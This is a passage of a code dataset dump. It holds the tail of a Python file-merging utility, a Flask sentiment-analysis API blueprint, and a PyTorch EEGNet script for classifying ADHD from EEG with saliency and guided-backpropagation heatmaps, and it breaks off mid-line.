os.path.join(output_path, output_file_name))\n\n def setup_paths(merge_dir):\n if not os.path.exists(output_path):\n make_dirs(output_path)\n if merge_dir is None:\n merge_dir = output_path\n else:\n merge_dir = os.path.abspath(merge_dir)\n make_dirs(merge_dir)\n os.chdir(merge_dir)\n\n buckets = build_buckets(input_file_list)\n setup_paths(merge_dir)\n merge(buckets)\n if merge_dir is not None:\n remove_directory(os.path.abspath(merge_dir))\n", "repo_name": "morgenst/PyAnalysisTools", "sub_path": "PyAnalysisTools/base/IOTools.py", "file_name": "IOTools.py", "file_ext": "py", "file_size_in_byte": 3368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 13, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "builtins.input", "line_number": 18, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.remove_directory", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 22, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "builtins.map", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.system", "line_number": 68, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.move", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyAnalysisTools.base.ShellUtils.make_dirs", "line_number": 79, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 80, "usage_type": "call"}, {"api_name": "PyAnalysisTools.base.ShellUtils.remove_directory", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}]}
+{"seq_id": "23209181395", "text": "from flask import Blueprint, request, jsonify\n\nfrom logging_setup.logger import ApiLogger\nfrom ..application.application_api import app_token_required\nfrom .sentiment_handlers import add_new_sentiment as sh\nfrom .models.UserOverallSentiments import UserOverallSentiments\nfrom .models.UserInteractionSentiment import UserInteractionSentiment\n\nsentiment_bp = Blueprint(\n \"sentiment_api\", \n __name__,\n url_prefix='/sentiment',\n template_folder='templates/sentiment')\n\n@app_token_required\n@sentiment_bp.route(\"/\", methods=['POST'])\ndef get_user_sentiment(userid, contentid):\n flow_id = \"get_user_sentiments\".upper()\n try:\n contentid = request.args.get('contentid', default=None, type=str)\n towardsuserid = request.args.get(\n 'towardsuserid', default=None, type=str)\n\n ApiLogger.log_debug(flow_id, \"Fetching overall sentiments for \",\n f\"User_sentiment - parameters userid: {userid} contentid: {contentid}\")\n if contentid == None:\n return jsonify(UserOverallSentiments.get_user_sentiment(userid))\n\n return jsonify(UserInteractionSentiment.get_user_sentiment_for_content(userid, contentid, towardsuserid))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n\n@app_token_required\n@sentiment_bp.route(\"/\", methods=['POST'])\ndef set_user_sentiment():\n try:\n flow_id = \"set_user_sentiments\".upper()\n req = request\n ApiLogger.log_debug(flow_id, \"Api Begin\",\n f\"set user sentiments - {request.json}\")\n return jsonify(sh.set_user_sentiment(request.json, flow_id))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n\n@app_token_required\n@sentiment_bp.route(\"/check\", methods=['POST'])\ndef analyze_sentiment():\n try:\n flow_id = \"Analyze_sentiment\".upper()\n ApiLogger.log_debug(flow_id, \"Api Begin\", f\"{request.json}\")\n\n return jsonify(sh.get_sentiments_of_content(request.json, flow_id))\n except:\n ApiLogger.log_exception(flow_id, \"Api exception\", \"\")\n raise\n", "repo_name": "Pbasnal/flask-twitterclone", "sub_path": "api/blueprints/sentiment/sentiment_api.py", "file_name": "sentiment_api.py", "file_ext": "py", "file_size_in_byte": 2109, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 24, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 27, "usage_type": "call"}, {"api_name": "models.UserOverallSentiments.UserOverallSentiments.get_user_sentiment", "line_number": 27, "usage_type": "call"}, {"api_name": "models.UserOverallSentiments.UserOverallSentiments", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 29, "usage_type": "call"}, {"api_name": "models.UserInteractionSentiment.UserInteractionSentiment.get_user_sentiment_for_content", "line_number": 29, "usage_type": "call"}, {"api_name": "models.UserInteractionSentiment.UserInteractionSentiment", "line_number": 29, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 31, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 31, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 40, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 42, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment.set_user_sentiment", "line_number": 42, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 44, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 44, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 34, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_debug", "line_number": 52, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 54, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment.get_sentiments_of_content", "line_number": 54, "usage_type": "call"}, {"api_name": "sentiment_handlers.add_new_sentiment", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "logging_setup.logger.ApiLogger.log_exception", "line_number": 56, "usage_type": "call"}, {"api_name": "logging_setup.logger.ApiLogger", "line_number": 56, "usage_type": "name"}, {"api_name": "application.application_api.app_token_required", "line_number": 47, "usage_type": "name"}]}
+{"seq_id": "13874924436", "text": "import torch\nimport scipy.io as sio\nimport numpy as np\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nimport mne\n\nfrom scipy.integrate import simps\nfrom mne.time_frequency import psd_array_multitaper\n\nfrom torch.optim.lr_scheduler import StepLR, ReduceLROnPlateau\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.autograd import Variable\nfrom torch.utils.tensorboard import SummaryWriter\nfrom matplotlib.collections import LineCollection\nimport matplotlib.gridspec as gridspec\nfrom adhd_classification import data_load\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score, precision_score, recall_score, accuracy_score,confusion_matrix,roc_curve,f1_score\n\nfrom electrodes_positions import get_electrodes_coordinates, set_electrodes_montage, get_electrodes_positions\nfrom early_stopping import EarlyStopping\nPATH_DATASET_MAT= r\"C:\\Users\\Ahmed Guebsi\\Downloads\\ADHD_part1\"\n\n\ntorch.cuda.empty_cache()\ntorch.manual_seed(0)\nnp.random.seed(0)\nplt.rcParams.update({'font.size': 14})\n\n\nclass EEGNet(torch.nn.Module):\n def __init__(self, channelnum=19):\n super(EEGNet, self).__init__()\n\n # model parameters\n self.eps = 1e-05\n\n self.f1 = 8\n self.d = 2\n self.conv1 = torch.nn.Conv2d(1, self.f1, (1, 64), padding=(0, 32), bias=False)\n self.batchnorm1 = torch.nn.BatchNorm2d(self.f1, track_running_stats=False)\n self.batchnorm2 = torch.nn.BatchNorm2d(self.f1 * self.d, track_running_stats=False)\n self.batchnorm3 = torch.nn.BatchNorm2d(self.f1 * self.d, track_running_stats=False)\n self.activ1 = torch.nn.ELU()\n self.activ2 = torch.nn.ELU()\n self.depthconv = torch.nn.Conv2d(self.f1, self.f1 * self.d, (19, 1), groups=self.f1, bias=False)\n self.avgpool = torch.nn.AvgPool2d((1, 4))\n self.separable = torch.nn.Conv2d(self.f1 * self.d, self.f1 * self.d, (1, 16), padding=(0, 8),\n groups=self.f1 * self.d, bias=False)\n self.fc1 = torch.nn.Linear(256, 2) # 128\n self.softmax = nn.LogSoftmax(dim=1)\n self.softmax1 = nn.Softmax(dim=1)\n self.dropout = nn.Dropout(p=0.5)\n\n # parameters for the interpretation techniques\n self.batch_mean1 = 0\n self.batch_std1 = 0\n self.gamma1 = 0\n self.beta1 = 0\n self.batch_mean2 = 0\n self.batch_std2 = 0\n self.gamma2 = 0\n self.beta2 = 0\n self.batch_mean3 = 0\n self.batch_std3 = 0\n self.gamma3 = 0\n self.beta3 = 0\n self.activ_in1 = 0\n self.activ_out1 = 0\n self.activ_baseline_in1 = 0\n self.activ_baseline_out1 = 0\n self.activ_in2 = 0\n self.activ_out2 = 0\n self.activ_baseline_in2 = 0\n self.activ_baseline_out2 = 0\n\n def forward(self, inputdata):\n intermediate = self.conv1(inputdata)\n\n intermediate = self.batchnorm1(intermediate)\n\n intermediate = self.depthconv(intermediate)\n\n intermediate = self.batchnorm2(intermediate)\n\n intermediate = self.activ1(intermediate)\n\n intermediate = F.avg_pool2d(intermediate, (1, 4))\n\n intermediate = self.dropout(intermediate)\n\n intermediate = self.separable(intermediate)\n\n intermediate = self.batchnorm3(intermediate)\n\n intermediate = self.activ2(intermediate)\n\n intermediate = F.avg_pool2d(intermediate, (1, 8))\n\n intermediate = self.dropout(intermediate)\n\n intermediate = intermediate.view(intermediate.size()[0], -1)\n\n intermediate = self.fc1(intermediate)\n\n output = self.softmax(intermediate)\n print(output.shape)\n print(output)\n\n return output\n\n def update_softmax_forward(self):\n def softmax_forward_hook_function(module, ten_in, ten_out):\n return ten_in[0]\n\n handle = self.softmax.register_forward_hook(softmax_forward_hook_function)\n\n return handle\n\n # make the batch normalization layer a linear operation before applying backpropagation to remove the effects of other samples in the batch\n\n def update_batch_forward(self):\n def batch_forward_hook_function1(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean1 = self.batch_mean1.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd1 = self.batch_std1.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean1), batchstd1)\n gammamatrix = (self.gamma1).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta1).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n def batch_forward_hook_function2(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean2 = self.batch_mean2.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd2 = self.batch_std2.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean2), batchstd2)\n gammamatrix = (self.gamma2).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta2).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n def batch_forward_hook_function3(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean3 = self.batch_mean3.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd3 = self.batch_std3.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean3), batchstd3)\n gammamatrix = (self.gamma3).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta3).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n handle1 = self.batchnorm1.register_forward_hook(batch_forward_hook_function1)\n handle2 = self.batchnorm2.register_forward_hook(batch_forward_hook_function2)\n handle3 = self.batchnorm3.register_forward_hook(batch_forward_hook_function3)\n\n return [handle1, handle2, handle3]\n\n # Save the batch mean and std\n\n def update_batch_forward_meanstd(self):\n def batch_forward_hook_function1(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean1 = torch.mean(data, [0, 2, 3], True)\n self.batch_std1 = torch.sqrt(torch.mean((data - self.batch_mean1) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma1 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta1 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma1[0, :, 0, 0] = self.batchnorm1.weight.clone().detach().requires_grad_(False).cpu()\n self.beta1[0, :, 0, 0] = self.batchnorm1.bias.clone().detach().requires_grad_(False).cpu()\n\n def batch_forward_hook_function2(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean2 = torch.mean(data, [0, 2, 3], True)\n self.batch_std2 = torch.sqrt(torch.mean((data - self.batch_mean2) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma2 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta2 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma2[0, :, 0, 0] = self.batchnorm2.weight.clone().detach().requires_grad_(False).cpu()\n self.beta2[0, :, 0, 0] = self.batchnorm2.bias.clone().detach().requires_grad_(False).cpu()\n\n def batch_forward_hook_function3(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean3 = torch.mean(data, [0, 2, 3], True)\n self.batch_std3 = torch.sqrt(torch.mean((data - self.batch_mean3) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma3 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta3 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma3[0, :, 0, 0] = self.batchnorm3.weight.clone().detach().requires_grad_(False).cpu()\n self.beta3[0, :, 0, 0] = self.batchnorm3.bias.clone().detach().requires_grad_(False).cpu()\n\n handle1 = self.batchnorm1.register_forward_hook(batch_forward_hook_function1)\n handle2 = self.batchnorm2.register_forward_hook(batch_forward_hook_function2)\n handle3 = self.batchnorm3.register_forward_hook(batch_forward_hook_function3)\n\n return [handle1, handle2, handle3]\n\n def update_activ_forward(self):\n def activ_forward_hook_function1(module, ten_in, ten_out):\n self.activ_in1 = ten_in[0].clone().detach().requires_grad_(False).cpu()\n self.activ_out1 = ten_out.clone().detach().requires_grad_(False).cpu()\n\n def activ_forward_hook_function2(module, ten_in, ten_out):\n self.activ_in2 = ten_in[0].clone().detach().requires_grad_(False).cpu()\n self.activ_out2 = ten_out.clone().detach().requires_grad_(False).cpu()\n\n handle1 = self.activ1.register_forward_hook(activ_forward_hook_function1)\n handle2 = self.activ2.register_forward_hook(activ_forward_hook_function2)\n #\n return [handle1, handle2]\n\n\n def update_activ_deconvolution(self):\n def activ_backward_hook_function(mmodule, grad_in, grad_out):\n modified_grad = torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n handle1 = self.activ1.register_backward_hook(activ_backward_hook_function)\n handle2 = self.activ2.register_backward_hook(activ_backward_hook_function)\n return [handle1, handle2]\n\n def update_activ_guidedbackpropogation(self):\n def activ_backward_hook_function1(mmodule, grad_in, grad_out):\n forwardpass = torch.where(self.activ_out1 > 0, torch.ones_like(self.activ_out1),torch.zeros_like(self.activ_out1))\n modified_grad = forwardpass * torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n def activ_backward_hook_function2(mmodule, grad_in, grad_out):\n forwardpass = torch.where(self.activ_out2 > 0, torch.ones_like(self.activ_out2),torch.zeros_like(self.activ_out2))\n modified_grad = forwardpass * torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n handle1 = self.activ1.register_backward_hook(activ_backward_hook_function1)\n handle2 = self.activ2.register_backward_hook(activ_backward_hook_function2)\n return [handle1, handle2]\n\n\nclass VisTech():\n def __init__(self, model):\n self.model = model\n self.model.eval()\n\n self.eps = 0.000001\n self.method = None\n\n def enhanceheatmap(self, heatmap, r=5):\n\n sampleChannel = heatmap.shape[0]\n sampleLength = heatmap.shape[1]\n\n newmap = np.zeros((sampleChannel, sampleLength))\n for i in range(sampleChannel):\n for j in range(sampleLength):\n if j < r:\n newmap[i, j] = np.mean(heatmap[i, :j + r])\n elif j + r > sampleLength:\n newmap[i, j] = np.mean(heatmap[i, j - r:])\n else:\n newmap[i, j] = np.mean(heatmap[i, j - r:j + r])\n\n return newmap\n\n def convert_batchlayer_to_linear(self, batchInput):\n\n handles = self.model.update_batch_forward_meanstd()\n self.model(batchInput)\n self.remove_registered_functions(handles)\n handles = self.model.update_batch_forward()\n\n return handles\n\n def remove_registered_functions(self, handles):\n for handle in handles:\n handle.remove()\n\n def heatmap_calculation_backpropogation(self, batchInput, sampleidx, method='EpsilonLRP'):\n # This function output the heatmaps generate with different interpretation techniques.\n # Most of the techques can be achieved by modifying the nonlinear activation layers\n\n def calculate_one_hot_out_put(output):\n result = output.cpu().detach().numpy()\n preds = result.argmax(axis=-1)\n one_hot_output = np.zeros(result.shape)\n\n for i in range(preds.shape[0]):\n one_hot_output[i, preds[i]] = 1\n\n one_hot_output = torch.DoubleTensor(one_hot_output)\n\n return one_hot_output\n\n sampleInput = batchInput\n sampleInput.requires_grad = True\n\n handles0 = self.convert_batchlayer_to_linear(batchInput)\n\n if method == \"guidedbackpropogation\":\n handles1 = self.model.update_activ_forward()\n handles2 = self.model.update_activ_guidedbackpropogation()\n\n output = self.model(sampleInput)\n one_hot_output = calculate_one_hot_out_put(output)\n output.backward(gradient=one_hot_output)\n grad = sampleInput.grad\n heatmap = grad.cpu().detach().numpy().squeeze()\n\n self.remove_registered_functions(handles1 + handles2)\n\n\n elif method == \"Saliencymap\":\n output = self.model(sampleInput)\n\n one_hot_output = calculate_one_hot_out_put(output)\n output.backward(gradient=one_hot_output)\n grad = sampleInput.grad\n heatmap = grad.cpu().detach().numpy().squeeze()\n\n\n self.remove_registered_functions(handles0)\n # the methods will generate heatmaps for a batch, otherwise return the heatmap for a sample\n if sampleidx != None:\n heatmap = heatmap[sampleidx]\n\n return heatmap\n\n\n def generate_interpretation(self, batchInput, sampleidx, subid, samplelabel, likelihood, method):\n\n if likelihood[0] > likelihood[1]: #likelihood of the sample to be classified into normal and adhd state\n state = 0\n else:\n state = 1\n\n if samplelabel == 0:\n labelstr = 'normal'\n else:\n labelstr = 'adhd'\n\n sampleInput = batchInput[sampleidx].cpu().detach().numpy().squeeze()\n sampleChannel = sampleInput.shape[0]\n sampleLength = sampleInput.shape[1]\n\n channelnames =['Fp1', 'Fp2', 'F7', 'F3', 'Fz', 'F4', 'F8', 'T7', 'C3', 'Cz', 'C4', 'T8','P7', 'P3', 'Pz', 'P4', 'P8', '01', '02']\n\n\n heatmap_sample_thres = 2\n heatmap_channel_thres = 1\n\n # generate the original sample and channel contribution maps\n heatmap = self.heatmap_calculation_backpropogation(batchInput=batchInput, sampleidx=sampleidx, method=method)\n heatmap_channel = np.mean(heatmap, axis=1)\n\n\n # Step 1: normalization\n heatmap = (heatmap - np.mean(heatmap)) / (np.std(heatmap))\n heatmap_channel = (heatmap_channel - np.mean(heatmap_channel)) / (np.std(heatmap_channel))\n\n # Step 2: thresholding\n heatmap_channel = heatmap_channel - heatmap_channel_thres\n heatmap = heatmap - heatmap_sample_thres\n\n # set values below lower bound of color map -1 to -1\n for u in range(sampleChannel):\n for l in range(sampleLength):\n if heatmap[u, l] < -1:\n heatmap[u, l] = -1\n # Step 3: smoothing\n smooth_factor = 5\n heatmap = self.enhanceheatmap(heatmap, smooth_factor)\n\n\n\n # draw the figure\n rowdivide = 4\n fig = plt.figure(figsize=(15, 9))\n gridlayout = gridspec.GridSpec(ncols=2, nrows=rowdivide, figure=fig, wspace=0.05, hspace=0.3)\n axs0 = fig.add_subplot(gridlayout[0:rowdivide - 1, 0])\n axs1 = fig.add_subplot(gridlayout[0:rowdivide - 1, 1])\n axs2 = fig.add_subplot(gridlayout[rowdivide - 1, :])\n\n axs2.xaxis.set_ticks([])\n axs2.yaxis.set_ticks([])\n\n # display the results\n axs2.text(0.01, 0.8, 'Model: EEGNET Interpretation: ' + method ,horizontalalignment='left', fontsize=15)\n fig.suptitle('Subject:' + str(int(subid)) + ' ' + 'Label:' + labelstr + ' ' + '$P_{normal}=$' + str(\n round(likelihood[0], 2)) + ' $P_{adhd}=$' + str(round(likelihood[1], 2)), y=0.985, fontsize=17)\n\n\n thespan = np.percentile(sampleInput, 98)\n xx = np.arange(1, sampleLength + 1)\n\n for i in range(0, sampleChannel):\n y = sampleInput[i, :] + thespan * (sampleChannel - 1 - i)\n dydx = heatmap[i, :]\n\n points = np.array([xx, y]).T.reshape(-1, 1, 2)\n segments = np.concatenate([points[:-1], points[1:]], axis=1)\n norm = plt.Normalize(-1, 1)\n lc = LineCollection(segments, cmap='viridis', norm=norm)\n lc.set_array(dydx)\n lc.set_linewidth(2)\n axs0.add_collection(lc)\n\n yttics = np.zeros(sampleChannel)\n for gi in range(sampleChannel):\n yttics[gi] = gi * thespan\n\n axs0.set_ylim([-thespan, thespan * sampleChannel])\n axs0.set_xlim([0, sampleLength + 1])\n axs0.set_xticks([1, 128, 256, 384,512])\n axs0.set_xticklabels(['0', '1', '2','3', '4(s)'])\n\n inversechannelnames = []\n for i in range(sampleChannel):\n inversechannelnames.append(channelnames[sampleChannel - 1 - i])\n\n plt.sca(axs0)\n plt.yticks(yttics, inversechannelnames)\n\n montage = 'standard_1020'\n sfreq = 128\n\n info = mne.create_info(\n channelnames,\n ch_types=['eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg'],\n sfreq=sfreq\n )\n\n electrodes_coordinates = get_electrodes_coordinates(channelnames)\n # print(electrodes_coordinates)\n dig_points = get_electrodes_positions(channelnames, electrodes_coordinates)\n _,info = set_electrodes_montage(channelnames, electrodes_coordinates,sampleInput)\n\n im, cn = mne.viz.plot_topomap(data=heatmap_channel, pos=info, vmin=-1, vmax=1, axes=axs1, names=channelnames,\n show_names=True, outlines='head', cmap='viridis', show=False)\n fig.colorbar(im, ax=axs1)\n plt.show()\n\ndef plot_roc(fpr, tpr):\n plt.plot(fpr, tpr, label = 'ROC curve', linewidth = 2)\n plt.plot([0,1],[0,1], 'k--', linewidth = 2)\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC Curve ')\n plt.show()\ndef plot_cm(cm):\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.colorbar()\n plt.tight_layout()\n plt.xlabel('Predicted label')\n plt.ylabel('True label')\n\ndef specificity(y_true, y_pred):\n tn = sum((y_true == 0) & (y_pred == 0))\n fp = sum((y_true == 0) & (y_pred == 1))\n return tn / (tn + fp)\ndef sensitivity(y_true, y_pred):\n tp = sum((y_true == 1) & (y_pred == 1))\n fn = sum((y_true == 1) & (y_pred == 0))\n return tp / (tp + fn)\n\n\ndef run():\n\n\n channelnum = 19\n subjnum =120\n samplelength = 4\n sf = 128\n\n # define the learning rate, batch size and epoches\n lr = 1e-3\n batch_size = 32\n n_epoch = 2\n\n x_data, y_data, subIdx = data_load(PATH_DATASET_MAT)\n x_data = np.swapaxes(x_data, 2, 0)\n y_data = np.swapaxes(y_data, 1, 0)\n subIdx = np.swapaxes(subIdx, 1, 0)\n print(y_data[0:600, 1:4])\n print('x_data.shape: ', x_data.shape)\n print('y_data.shape: ', y_data.shape)\n print(subIdx)\n subIdx.astype(int)\n\n\n samplenum = y_data.shape[0]\n label = y_data[:, 0]\n print(\"laaaaaaaaaaabel\",label.shape)\n print(np.unique(subIdx))\n\n # ydata contains the label of samples\n ydata = np.zeros(samplenum, dtype=np.longlong)\n\n # the result stores accuracies of every subject\n results = []\n\n for i in range(samplenum):\n ydata[i] = label[i]\n\n X_train_org, X_test_org, y_train_org, y_test_org = train_test_split(x_data, y_data, test_size=0.2, shuffle=True,\n random_state=42)\n\n # select the subject index here\n for i in range(1, subjnum + 1):\n # form the training data\n trainindx = np.where(subIdx != i)[0]\n xtrain = x_data[trainindx]\n x_train = xtrain.reshape(xtrain.shape[0], 1, channelnum, samplelength * sf)\n y_train = ydata[trainindx]\n\n # form the testing data\n testindx = np.where(subIdx == i)[0]\n xtest = x_data[testindx]\n x_test = xtest.reshape(xtest.shape[0], 1, channelnum, samplelength * sf)\n y_test = ydata[testindx]\n\n train = torch.utils.data.TensorDataset(torch.from_numpy(x_train), torch.from_numpy(y_train))\n train_loader = torch.utils.data.DataLoader(train, batch_size=batch_size, shuffle=True)\n\n # select the deep learning model to be used\n #my_net = InterpretableCNN().double()\n my_net = EEGNet().double()\n\n for p in my_net.parameters():\n p.requires_grad = True\n\n optimizer = optim.Adam(my_net.parameters(), lr=lr)\n loss_class = torch.nn.NLLLoss()\n # Define ReduceLROnPlateau scheduler\n scheduler = ReduceLROnPlateau(optimizer, mode='min', patience=10, verbose=True)\n\n # Define early stopping parameters\n early_stopping = {\n 'patience': 20, # Number of epochs with no improvement after which training will be stopped\n 'min_delta': 0.001, # Minimum change in validation loss to be considered as an improvement\n 'best_loss': float('inf'), # Initialize with a large value\n 'counter': 0 # Counter for the number of epochs with no improvement\n }\n\n # Tensorboard writer for logging\n\n\n train_accuracies = []\n val_accuracies = []\n\n # to track the training loss as the model trains\n train_losses = []\n # to track the validation loss as the model trains\n valid_losses = []\n # to track the average training loss per epoch as the model trains\n avg_train_losses = []\n # to track the average validation loss per epoch as the model trains\n avg_valid_losses = []\n\n patience = 20\n # initialize the early_stopping object\n early_stopping = EarlyStopping(patience=patience, verbose=True)\n\n # train the classifier\n for epoch in range(1,n_epoch+1):\n for j, data in enumerate(train_loader, 0):\n inputs, labels = data\n\n input_data = inputs\n class_label =labels\n #class_label = labels.view(-1, 1 ).double() for BCELoss\n\n train_loss =0.0\n\n my_net.zero_grad()\n my_net.train()\n\n class_output = my_net(input_data)\n err_s_label = loss_class(class_output, class_label)\n err = err_s_label\n\n err.backward()\n optimizer.step()\n train_loss += err.item()\n # record training loss\n train_losses.append(err.item())\n\n # Calculate average training loss for the epoch\n avg_train_loss = train_loss / len(train_loader)\n print(\"train loss avg\",avg_train_loss)\n\n my_net.eval()\n val_loss =0.0\n with torch.no_grad():\n\n x_test = torch.DoubleTensor(x_test)\n answer = my_net(x_test)\n print(\"y_test\",y_test)\n y_test = torch.from_numpy(y_test)\n #y_test=y_test.view(-1,1).double() for BCELoss\n print(type(y_test))\n loss = loss_class(answer, y_test)\n val_loss += loss.item()\n valid_losses.append(loss.item())\n probs = np.exp(answer.cpu().numpy())\n print(\"probs\",probs)\n\n preds = probs.argmax(axis=-1)\n print(\"preds\",preds)\n acc = 